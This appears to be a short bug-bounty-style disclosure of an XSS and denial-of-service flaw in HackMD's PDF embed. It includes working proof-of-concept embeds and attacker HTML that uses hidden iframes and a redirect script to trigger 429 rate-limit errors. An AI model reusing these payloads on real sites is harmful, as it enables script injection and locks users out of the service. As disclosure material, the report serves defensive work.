Impropper url embed with PDF leading XSS and DoS

[William957-web]

HackMD can iframe a pdf file through its url like this:

{%pdf https://example.com/meow.pdf%}

However, it doesn't filter the url well and it would lead to a XSS (though couldn't still cookie...)
POC: https://hackmd.io/@Whale120/DEMO_XSS

# what happend anyway
{%pdf https://william957-web.github.io/meow_xss.html%}

What's more?
Attack can construct a simple site like this:

<iframe width="1" height="1" frameborder="1" scrolling="no" vspace="1" hspace="1" marginheight="1" marginwidth="1" src="https://hackmd.io/new">a</iframe>
<iframe width="1" height="1" frameborder="1" scrolling="no" vspace="1" hspace="1" marginheight="1" marginwidth="1" src="https://hackmd.io/@Whale120/iframe_dos_demo">a</iframe>
<script>
  location.href="https://william957-web.github.io/meow_dos.html";
</script>

And iframe the attacker's site:
PoC: https://hackmd.io/@Whale120/iframe_dos_demo

{%pdf https://hackmd.io/@Whale120/iframe_dos_demo%}
{%pdf https://william957-web.github.io/meow_dos.html%}

# whale
The whale is the biggest creature under the sea.
Meowing whale, is that correct?

After a short period of time, users will be unable to add new articles (429 error).